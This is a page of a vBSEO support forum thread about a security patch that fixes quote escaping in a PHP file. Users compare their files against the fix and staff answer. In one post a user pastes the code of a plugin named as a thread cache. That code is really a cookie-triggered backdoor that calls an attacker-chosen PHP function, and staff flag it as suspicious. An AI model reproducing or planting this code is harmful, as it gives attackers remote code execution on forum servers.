Page 2 of 12 FirstFirst 1 2 3 4 5 6 7 8 9 10 11 12 LastLast
Results 16 to 30 of 170
Like Tree174Likes

*vBSEO Security Bulletin* All Supported Versions: Patch Release

This is a discussion on *vBSEO Security Bulletin* All Supported Versions: Patch Release within the vBSEO Announcements forums, part of the Announcements & Pre-Sales category; Originally Posted by faquick I assume I could just download the updated package and replace the ' functions_vbseocp_abstract.php' file, instead ...

  1. #16
    vBSEO Staff Array Brian Cummiskey's Avatar
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    675 times
    Blog Entries
    2
    Quote Originally Posted by faquick View Post
    I assume I could just download the updated package and replace the '
    functions_vbseocp_abstract.php' file, instead of manually editing that file. Am I right?
    Yes, you can over-write just that file if you wish.

    Quote Originally Posted by Talaturen View Post
    The code in that function already looked like the content of "Replace with" on my forum with vBSEO 3.6.0, so what exactly was changed in 3.6.0?
    Basically
    "$1"
    turned into
    \'$1\'
    Brian Cummiskey / Crawlability Inc.
    Security bulletin - Patch Level for all supported versions released

    Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!


  2. #17
    Junior Member Array
    Real Name
    Damiaan Habets
    Join Date
    Feb 2011
    Posts
    2
    Liked
    0 times
    Quote Originally Posted by Talaturen View Post
    The code in that function already looked like the content of "Replace with" on my forum with vBSEO 3.6.0, so what exactly was changed in 3.6.0?
    Exact same situation here. The file was from March 2011!

    It appears in the zip file that functions_vbseo.php was touched today.

    Could someone double check what was done?

  3. #18
    Junior Member Array
    Real Name
    Mark
    Join Date
    Aug 2008
    Posts
    13
    Liked
    15 times
    Quote Originally Posted by Brian Cummiskey View Post
    Yes, you can over-write just that file if you wish.



    Basically
    "$1"
    turned into
    \'$1\'
    That was also the difference I noticed, but my concern here is that 3.6.0 that I already had on my forum already was \'$1\', does this mean that 3.6.0 was not affected? And if so, then what was changed in 3.6.0 because it says that it was last updated today.

  4. #19
    Member Array SkRteL's Avatar
    Real Name
    Ali Bülbül
    Join Date
    Nov 2011
    Posts
    50
    Liked
    0 times
    Done!
    Forumdevi.com Forum Devi - Eğlencenin Devi

  5. #20
    Junior Member Array
    Real Name
    Damiaan Habets
    Join Date
    Feb 2011
    Posts
    2
    Liked
    0 times
    And yes, it already has the double quotes changed into single quotes.

  6. #21
    Junior Member Array
    Real Name
    Sam Chacko
    Join Date
    Nov 2011
    Location
    New Delhi, India, India
    Posts
    2
    Liked
    0 times
    @faquick, I did the same. But I verified with the code given able also, and it matches to the T. So I guess replacing the file will work!

  7. #22
    Junior Member Array
    Real Name
    Cesar Aracena
    Join Date
    Aug 2009
    Location
    Neuquen, Argentina
    Posts
    26
    Liked
    0 times
    Thanks for the heads up but... do you have any idea why that function ws already changed in my 'functions_vbseocp_abstract.php' file? It already had the backslashes in it and all. Weird.
    Cesar Aracena

  8. #23
    vBSEO Staff Array Brian Cummiskey's Avatar
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    675 times
    Blog Entries
    2
    Quote Originally Posted by Talaturen View Post
    That was also the difference I noticed, but my concern here is that 3.6.0 that I already had on my forum already was \'$1\', does this mean that 3.6.0 was not affected? And if so, then what was changed in 3.6.0 because it says that it was last updated today.
    My personal site was this way as well. It looks like the original release was ok, but the update did not get this code block exported with it for some reason.

    If you have the escaped single quotes already, you are safe.
    Brian Cummiskey / Crawlability Inc.
    Security bulletin - Patch Level for all supported versions released

    Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!


  9. #24
    Junior Member Array
    Real Name
    Mark
    Join Date
    Aug 2008
    Posts
    13
    Liked
    15 times
    Quote Originally Posted by dhabets View Post
    Exact same situation here. The file was from March 2011!

    It appears in the zip file that functions_vbseo.php was touched today.

    Could someone double check what was done?
    I couldn't find any changes there. The only changes I've found were in vbseo/resources/scripts/vbseo_ajax.js and includes/md5_sums_crawlability_vbseo.php. I also found a bug in includes/md5_sums_crawlability_vbseo.php while checking it.
    '/vbseo/resources/js' should be '/vbseo/resources/scripts', not really serious though but if you don't change it you won't know if your vBSEO js contains expected content.

  10. #25
    Junior Member Array
    Real Name
    Frank Heilmann
    Join Date
    Feb 2010
    Posts
    2
    Liked
    0 times
    I have downloaded now the actual pack for 3.5.2 on the website and have replaced the 'functions_vbseocp_abstract.php' file - how can I check if I have successfully fixed the bug?
    Last edited by Frankcom; 01-23-2012 at 02:38 PM. Reason: wrong

  11. #26
    Junior Member Array
    Real Name
    ahmed alfaifi
    Join Date
    Feb 2008
    Posts
    21
    Liked
    0 times
    Done thank u

  12. #27
    Member Array
    Real Name
    Alan
    Join Date
    May 2011
    Posts
    31
    Liked
    3 times
    Quote Originally Posted by Brian Cummiskey View Post
    If you do see anything that doesn't look familiar, it may be wise to disable that plugin while troubleshooting further. Most reports have been tied to the global_complete hook under the core 'vBulletin' product, but may also be elsewhere.
    There I have this plugin: vBCMS Global Thread Cache

    Code in it is this:

    PHP Code:
    /* vBCMS Global Thread Cache */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20); 
    I assume this is ok?

    I have lots of mods and I can't be sure in some plugins what they really do, but assume they are safe. Is this safe plugin?

  13. #28
    Junior Member Array
    Real Name
    mark singleton
    Join Date
    Nov 2007
    Posts
    18
    Liked
    0 times
    I have version 3.6 and that line was already the same as the new line you provided, so I didnt need to replace it.

  14. #29
    Senior Member Array
    Real Name
    Chad Skinner
    Join Date
    Feb 2009
    Posts
    140
    Liked
    0 times
    Is this fix associated with the link back exploit?

  15. #30
    vBSEO Staff Array Oleg Ignatiuk's Avatar
    Real Name
    Oleg Ignatiuk
    Join Date
    Jun 2005
    Location
    Belarus
    Posts
    25,818
    Liked
    192 times
    There I have this plugin: vBCMS Global Thread Cache
    The code looks suspicious and I would remove this if you did not specifically install something like this.
    Oleg Ignatiuk / Crawlability Inc.
    Security bulletin - Patch Level for all supported versions released

    Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!


Page 2 of 12 FirstFirst 1 2 3 4 5 6 7 8 9 10 11 12 LastLast

Similar Threads

  1. Replies: 135
    Last Post: 02-24-2011, 07:45 AM
  2. Security Patch Release 3.8.6 PL1
    By vBulletin.com Staff in forum vBulletin.com Announcements
    Replies: 3
    Last Post: 07-23-2010, 06:27 AM
  3. Security Patch Release 4.0.2 PL3
    By vBulletin.com Staff in forum vBulletin.com Announcements
    Replies: 0
    Last Post: 03-25-2010, 12:50 PM
  4. JELSOFT SECURITY BULLETIN - vBulletin 3.6.8 Patch Level 1 Released
    By vBulletin.com Staff in forum vBulletin.com Announcements
    Replies: 0
    Last Post: 11-08-2007, 02:38 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •